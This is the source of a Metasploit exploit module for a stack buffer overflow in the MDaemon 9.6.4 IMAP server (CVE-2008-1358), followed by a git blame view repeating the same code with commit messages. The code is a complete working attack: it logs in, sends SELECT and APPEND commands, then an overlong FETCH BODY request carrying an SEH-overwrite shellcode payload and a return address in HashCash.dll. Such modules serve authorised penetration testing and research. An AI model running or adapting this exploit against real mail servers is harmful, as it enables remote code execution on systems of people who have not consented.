modules/exploits/windows/imap/mdaemon_fetch.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Imap
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MDaemon 9.6.4 IMAPD FETCH Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server
        version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP
        account credentials are required. Credit to Matteo Memelli
      },
      'Author'         => [ 'Jacopo Cervini', 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-1358' ],
          [ 'OSVDB', '43111' ],
          [ 'BID', '28245' ],
          [ 'EDB', '5248' ]
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0a])",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MDaemon Version 9.6.4', { 'Ret' => 0x64dc118b } ], # p/p/r HashCash.dll
        ],
      'DisclosureDate' => '2008-03-13',
      'DefaultTarget' => 0))
  end

  def check
    connect
    disconnect

    if (banner and banner =~ /IMAP4rev1 MDaemon 9\.6\.4 ready/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect_login

    req0="0002 SELECT Inbox\r\n"

    res = raw_send_recv(req0)
    if (res and res =~ /0002 OK/)
      print_status("SELECT command OK")
    end

    req1="0003 APPEND Inbox {1}\r\n"

    res = raw_send_recv(req1)
    if (res and res =~ /Ready for append literal/)
      print_status("APPEND command OK")
    end

    res = raw_send_recv(rand_text_alpha(20) + "\r\n")
    if (res and res =~ /APPEND completed/)
      print_status("APPEND command finished")
    end

    buf = rand_text_alpha_upper(528, payload_badchars)
    buf << generate_seh_payload(target.ret) + rand_text_alpha_upper(35, payload_badchars)

    sploit = "A654 FETCH 2:4 (FLAGS BODY[" + buf + "(DATE FROM)])\r\n"

    print_status("Sending payload")

    sock.put(sploit)

    handler
    disconnect
  end
end
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Imap`
			`include Msf::Exploit::Seh`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`'Name' => 'MDaemon 9.6.4 IMAPD FETCH Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server`
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP`
			`account credentials are required. Credit to Matteo Memelli`
			`},`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`'Author' => [ 'Jacopo Cervini', 'aushack' ],`
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2008-1358' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '43111' ],`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`[ 'BID', '28245' ],`
Update milw0rm references. 2012-06-28 14:27:12 -05:00			`[ 'EDB', '5248' ]`
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`],`
			`'Privileged' => false,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'seh',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x0a])",`
			`},`
			`'Platform' => 'win',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`[`
			`[ 'MDaemon Version 9.6.4', { 'Ret' => 0x64dc118b } ], # p/p/r HashCash.dll`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2008-03-13',`
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`'DefaultTarget' => 0))`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`def check`
			`connect`
			`disconnect`
Retab modules 2013-08-30 16:28:54 -05:00
Update exploit checks 2014-01-20 14:26:10 -06:00			`if (banner and banner =~ /IMAP4rev1 MDaemon 9\.6\.4 ready/)`
			`return Exploit::CheckCode::Appears`
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`end`
			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`def exploit`
			`connect_login`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`req0="0002 SELECT Inbox\r\n"`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`res = raw_send_recv(req0)`
			`if (res and res =~ /0002 OK/)`
			`print_status("SELECT command OK")`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`req1="0003 APPEND Inbox {1}\r\n"`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`res = raw_send_recv(req1)`
			`if (res and res =~ /Ready for append literal/)`
			`print_status("APPEND command OK")`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`res = raw_send_recv(rand_text_alpha(20) + "\r\n")`
			`if (res and res =~ /APPEND completed/)`
			`print_status("APPEND command finished")`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`buf = rand_text_alpha_upper(528, payload_badchars)`
			`buf << generate_seh_payload(target.ret) + rand_text_alpha_upper(35, payload_badchars)`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`sploit = "A654 FETCH 2:4 (FLAGS BODY[" + buf + "(DATE FROM)])\r\n"`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`print_status("Sending payload")`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`sock.put(sploit)`
Retab modules 2013-08-30 16:28:54 -05:00
Exploit module from Jacopo Cervini 2008-04-06 10:45:29 +00:00			`handler`
			`disconnect`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`